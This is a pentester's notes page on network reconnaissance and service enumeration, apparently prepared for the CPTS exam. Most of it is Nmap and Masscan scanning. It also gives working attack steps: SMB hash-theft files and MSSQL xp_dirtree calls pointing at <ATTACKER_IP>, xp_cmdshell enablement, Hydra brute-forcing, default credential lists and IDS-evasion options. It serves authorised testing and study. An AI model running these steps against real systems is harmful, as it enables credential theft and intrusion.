Pentest_Notes

🌐 Network Penetration Testing

Organized notes for network penetration testing — host discovery, port scanning, and service enumeration. Last Updated: 2026-03-27

---

Reconnaissance / Information Gathering

Overview

Network reconnaissance involves discovering live hosts, open ports, running services, and their versions on target systems. This is the foundation of every penetration test.

Checklist

• Perform passive network discovery (ARP, traffic sniffing)
• Perform active host discovery (ping sweep)
• Run quick port scans (top ports)
• Run full TCP port scan
• Run UDP port scan
• Perform service version detection on all open ports
• Run NSE scripts against identified services
• Document all findings

Passive Network Discovery

# ARP-based passive discovery
netdiscover -i eth1 -r 192.168.123.0/24 -p

# Listen for inbound traffic
sudo tcpdump -i eth1 'dst host 192.168.123.100 and (icmp or udp or tcp or arp)'

# Run Responder in analyze mode (passive)
responder -I eth1 -A

Active Host Discovery

# Nmap ping sweep
nmap -sn -PE -PM -PP -n --open 192.168.123.0/24

# Export live hosts from ping sweep
nmap -sn 10.0.0.0/24 -oG ping_sweep
23
cat ping_sweep | grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' | sort -u > online

# fping sweep
fping -asgq 192.168.123.0/24

# Netdiscover active scan
netdiscover -i eth1 -r 192.168.123.0/24

💡 Pro Tip: Not all hosts respond to ICMP. If ping sweep returns few results, try -Pn flag with Nmap to skip host discovery and scan all IPs directly.

Tools

Tool	Purpose	Basic Command
Nmap	Port scanning & service detection	nmap -p- -sV -sC <IP>
Masscan	Ultra-fast port scanning	masscan -p1-65535 <IP> --rate=1000
Rustscan	Fast port scan + Nmap integration	rustscan -a <IP> -- -sC -sV
Netdiscover	ARP-based host discovery	netdiscover -r <SUBNET>
fping	Fast ping sweep	fping -asgq <SUBNET>
tcpdump	Packet capture & analysis	sudo tcpdump -i eth1

---

Port Scanning

Checklist

• Run quick top-ports scan on all live hosts
• Run full TCP scan (-p-) on key targets
• Run UDP scan on key targets
• Verify scan results with service detection
• Note any filtered ports for further investigation

Nmap Scanning Reference

Basic Scans

# Scan a single IP
nmap 192.168.1.1

# Scan multiple IPs
nmap 192.168.1.1 192.168.1.2

# Scan a range
nmap 192.168.1.1-254

# Scan a subnet
nmap 192.168.1.0/24

# Scan from a file
nmap -iL targets.txt

Scan Types

# TCP SYN scan (default, requires root)
nmap -sS 192.168.1.1

# TCP connect scan (default without root)
nmap -sT 192.168.1.1

# UDP port scan
nmap -sU 192.168.1.1

# TCP ACK scan (firewall detection)
nmap -sA 192.168.1.1

Host Discovery Options

# Disable port scanning — host discovery only
nmap -sn 192.168.1.1

# Disable host discovery — port scan only
nmap -Pn 192.168.1.1

# Never do DNS resolution
nmap -n 192.168.1.1

Port Specification

# Scan specific ports
nmap -p 80,443,8080 192.168.1.1

# Scan all 65535 ports
nmap -p- 192.168.1.1

# Scan top N ports
nmap --top-ports 200 192.168.1.1

# Fast scan (top 100 ports)
nmap -F 192.168.1.1

# Scan by service name
nmap -p http,https 192.168.1.1

Version & OS Detection

# Aggressive scan (OS + version + scripts + traceroute)
nmap -A 192.168.1.1

# Version detection
nmap -sV 192.168.1.1

# Version intensity (0-9)
nmap -sV --version-intensity 7 192.168.1.1

# OS detection
nmap -O 192.168.1.1

# Aggressive OS guess
nmap -O --osscan-guess 192.168.1.1

Timing & Performance

# Paranoid (0) — IDS evasion
nmap -T0 192.168.1.1

# Insane (5) — fastest
nmap -T5 192.168.1.1

# Minimum packet rate
nmap --min-rate 1000 192.168.1.1

NSE Scripts

# Single script
nmap --script=banner 192.168.1.1

# Script with arguments
nmap --script=banner --script-args <args> 192.168.1.1

# Vulnerability scripts
nmap -p- --script=vuln 192.168.1.1

# HTTP methods enumeration
nmap -p80,443 --script=http-methods --script-args http-methods.url-path='/directory/' <IP>

# SMB share enumeration
nmap --script smb-enum-shares <IP>

Evasion Techniques

# Fragment packets
nmap -f 192.168.1.1

# Set MTU
nmap --mtu 32 192.168.1.1

# Decoy scan
nmap -D 192.168.1.11,192.168.1.12,192.168.1.13 192.168.1.1

Output Formats

# Normal output
nmap -oN scan.txt 192.168.1.1

# All formats (normal + XML + grepable)
nmap -oA scan 192.168.1.1

Recommended Scan Methodology

# Step 1: Quick all-port scan to find open ports
nmap -p- -v --min-rate 4000 -sV <IP>

# Step 2: Detailed scan of discovered ports
nmap -p <open_ports> -vv --min-rate 1000 -sV -sC <IP>

# Step 3: UDP scan
sudo nmap -Pn -n -sU --top-ports=100 <IP>

# Step 4: Detailed UDP version scan
nmap -sUV -vv --reason --version-intensity 0 --min-rate 1300 --max-retries 1 --top-ports 1000 <IP> -Pn

Scanning Multiple Hosts

# Loop scan all live hosts — top 100 ports
for ip in $(cat online); do nmap -sS -Pn --top-ports 100 -oA "quick_$ip" "$ip"; done

# Full TCP scan of all live hosts
sudo nmap -sS -p- -T4 -iL online -oA full_scan

Masscan

# Quick scan common ports across subnet
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 192.168.123.0/24

# Full port scan
masscan -p1-65535 <IP> --rate=1000 -oL masscan_results.txt

⚠️ CPTS Exam Tip: Always scan for web servers on non-standard ports. Use: nmap -vv -sV -p 80,443,8080,8443,8000,8888,8800,8088,8880,10443,9443 --script http-title --open <IP>

Common Pitfalls / Gotchas

• Forgetting UDP scans — SNMP (161), TFTP (69), DNS (53) are common finds
• Using -T5 on unstable networks causes false negatives
• Not scanning all 65535 ports — services on high ports are frequently missed
• Skipping -Pn when hosts don’t respond to ICMP
• Not saving output — always use -oA

---

Service Enumeration

Overview

After discovering open ports, each service must be enumerated in depth to identify versions, misconfigurations, and potential attack vectors.

Common Ports & Services Reference

Port	Service	Protocol
21	FTP	TCP
22	SSH	TCP
23	Telnet	TCP
25	SMTP	TCP
53	DNS	TCP/UDP
69	TFTP	UDP
80	HTTP	TCP
88	Kerberos	TCP
110	POP3	TCP
111	RPCBind	TCP/UDP
135	MS-RPC	TCP
139	NetBIOS	TCP
143	IMAP	TCP
161	SNMP	UDP
389	LDAP	TCP
443	HTTPS	TCP
445	SMB	TCP
464	Kpasswd	TCP
593	MS-RPC over HTTP	TCP
636	LDAPS	TCP
993	IMAPS	TCP
995	POP3S	TCP
1433	MSSQL	TCP
1521	Oracle	TCP
2049	NFS	TCP
3306	MySQL	TCP
3389	RDP	TCP
5432	PostgreSQL	TCP
5900	VNC	TCP
5985	WinRM HTTP	TCP
5986	WinRM HTTPS	TCP
6379	Redis	TCP
8080	HTTP Proxy	TCP
8443	HTTPS Alt	TCP
9200	Elasticsearch	TCP
27017	MongoDB	TCP

---

FTP (Port 21)

Checklist

• Check for anonymous login
• List all files and directories
• Download all accessible files
• Check FTP version for known CVEs
• Try default credentials
• Check for writable directories

# Connect to FTP
ftp <IP>

# Interact via netcat
nc -nv <IP> 21

# Download all files via anonymous access
wget -m --no-passive ftp://anonymous:anonymous@<IP>

# Nmap FTP scripts
nmap --script ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor -p 21 <IP>

💡 Pro Tip: Always try anonymous:anonymous and anonymous: (empty password) for FTP login.

Common Default Credentials

Username	Password
anonymous	anonymous
anonymous	(empty)
ftp	ftp
admin	admin

---

SMB (Ports 139, 445)

Checklist

• Check for null session access
• Check for guest access
• Enumerate shares
• List share contents
• Check for writable shares
• Enumerate users via RPC
• Check SMB version for vulnerabilities (EternalBlue, etc.)
• Try InternetShortcut / desktop.ini hash theft

# Connect to SMB share
smbclient //<IP>/<share>

# Null session enumeration
smbclient -L //<IP>/ -N
nxc smb <IP> -u "" -p "" --shares
nxc smb <IP> -u "guest" -p "" --shares
nxc smb <IP> -u "a" -p "" --shares

# Enumerate shares with smbmap
smbmap -H <IP>

# RPC null session
rpcclient -U "" -N <IP>
rpcclient -U'%' <IP>

# enum4linux
enum4linux -a <IP>

# CrackMapExec / NetExec enumeration
nxc smb <IP> --shares -u '' -p ''

# Connect via impacket
impacket-smbclient domain.com/guest@<IP>

SMB Hash Theft — InternetShortcut (.url file)

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<ATTACKER_IP>\%USERNAME%.icon
IconIndex=1

Upload to writable share and start Responder to capture hashes.

SMB Hash Theft — desktop.ini

[.ShellClassInfo]
IconResource=\\<ATTACKER_IP>\test

# Upload to writable share
smb> put desktop.ini

# Start Responder on attacker
responder -I tun0

Null/Anonymous Session Checks Across Subnet

# Check for SMB null session across all hosts
for ip in $(cat online); do smbclient -L "//$ip/" -N -g >/dev/null 2>&1 && echo $ip; done | tee smb_null.txt

# RPC null session check
for ip in $(cat online); do rpcclient -U "" -N "$ip" -c info 2>&1 | grep -q 'Domain' && echo $ip; done | tee rpc_null.txt

---

DNS (Port 53)

Checklist

• Identify nameservers
• Attempt zone transfer
• Query for common record types (A, MX, NS, TXT, CNAME)
• Brute-force subdomains

# NS record query
dig ns <domain> @<nameserver>

# ANY query
dig any <domain> @<nameserver>

# Zone transfer attempt
dig axfr <domain> @<nameserver>

# DNS recon
dnsrecon -d <domain>

# Subdomain brute-force with gobuster
gobuster dns -d <domain> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 30

⚠️ CPTS Exam Tip: Always try zone transfers (dig axfr) — they often reveal hidden subdomains and internal hostnames.

---

NFS (Port 2049)

Checklist

• List NFS exports
• Mount accessible shares
• Inspect all files
• Check for no_root_squash (allows root access)

# Show available NFS shares
showmount -e <IP>

# Mount NFS share
mount -t nfs <IP>:/<share> ./target-NFS/ -o nolock

# Check for NFS exports from subnet
for ip in $(cat online); do showmount -e "$ip" 2>/dev/null | grep -q "export list" && echo $ip; done | tee nfs_exports.txt

---

SMTP (Port 25)

Checklist

• Banner grab
• Enumerate users (VRFY, EXPN, RCPT)
• Check for open relay
• Test sending phishing emails

# Connect to SMTP
telnet <IP> 25

# User enumeration
smtp-user-enum -M VRFY -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t <IP>
smtp-user-enum -M RCPT -U userlist.txt -D <domain> -t <IP>
smtp-user-enum -M EXPN -U /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -t <IP>

# DNS lookup for mail servers
host -t MX <domain>
dig mx <domain> | grep "MX" | grep -v ";"

# Brute-force POP3
hydra -L users.txt -p 'Company01!' -f <IP> pop3

# Test for open relay
swaks --from notifications@<domain> --to target@<domain> --header 'Subject: Test' --body 'Test' --server <IP>

---

SNMP (Port 161/UDP)

Checklist

• Brute-force community strings
• Walk SNMP tree with found community string
• Extract usernames, processes, network info

# Walk SNMP with community string
snmpwalk -v2c -c <community_string> <IP>

# Brute-force community strings
onesixtyone -c community-strings.list <IP>

# Brute-force OIDs
braa <community_string>@<IP>:.1.*

# Check from subnet
for ip in $(cat online); do snmpwalk -v2c -c public -t1 -r1 "$ip" 2>/dev/null | head -n1 | grep -q "STRING\|INTEGER" && echo $ip; done | tee snmp_public.txt

Common SNMP Community Strings

String	Type
public	Read-only
private	Read-write
manager	Read-write
community	Read-only

---

IMAP / POP3 (Ports 110, 143, 993, 995)

# Connect to IMAPS
curl -k 'imaps://<IP>' --user <user>:<password>

# Connect to IMAPS via OpenSSL
openssl s_client -connect <IP>:imaps

# Connect to POP3S via OpenSSL
openssl s_client -connect <IP>:pop3s

---

MSSQL (Port 1433)

# Connect with impacket
impacket-mssqlclient <user>@<IP> -windows-auth

# Enable command execution
EXECUTE sp_configure 'show advanced options', 1
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGURE
xp_cmdshell 'whoami'

# Hash stealing
EXEC master..xp_dirtree '\\<ATTACKER_IP>\share\'
EXEC master..xp_subdirs '\\<ATTACKER_IP>\share\'

---

IPMI (Port 623/UDP)

# IPMI version detection
msf6> use auxiliary/scanner/ipmi/ipmi_version

# Dump IPMI hashes
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes

Common IPMI Default Credentials

Vendor	Username	Password
Dell iDRAC	root	calvin
HP iLO	Administrator	(random 8-char)
Supermicro	ADMIN	ADMIN

---

LDAP (Ports 389, 636)

Checklist

• Attempt anonymous bind
• Enumerate base DN
• Dump users, groups, computers
• Check for sensitive attributes

# Anonymous LDAP bind check
for ip in $(cat online); do ldapsearch -x -H "ldap://$ip" -s base -b "" -o nettimeout=3 "(objectclass=*)" 2>/dev/null | head -n1 | grep -q "namingContexts" && echo $ip; done | tee ldap_anon.txt

# Anonymous LDAP dump
ldapdomaindump <IP>

# LDAP search
ldapsearch -x -h <IP> -b "dc=domain,dc=com"

# LDAP user enumeration
ldapsearch -h <IP> -x -b "DC=DOMAIN,DC=COM" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "

# LDAP password policy
ldapsearch -h <IP> -x -b "DC=DOMAIN,DC=COM" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

---

SSH (Port 22)

# Force password authentication
ssh <user>@<IP> -o PreferredAuthentications=password

---

Useful One-Liners

# Extract IPs from a text file
grep -oE '((1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.){3}(1?[0-9][0-9]?|2[0-4][0-9]|25[0-5])' FILE

# Alternative IP extraction
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' nmapfile.txt

# Quick ICMP verification
tcpdump -i any -c5 icmp

Common Pitfalls / Gotchas

• Not checking UDP ports (SNMP, TFTP, DNS are commonly missed)
• Stopping enumeration after finding the first vulnerability
• Not trying null/guest/anonymous access on SMB across ALL hosts
• Forgetting to add discovered hostnames to /etc/hosts
• Not re-enumerating services after finding credentials

References & Further Reading

• Nmap Documentation
• HackTricks - Pentesting Network
• SecLists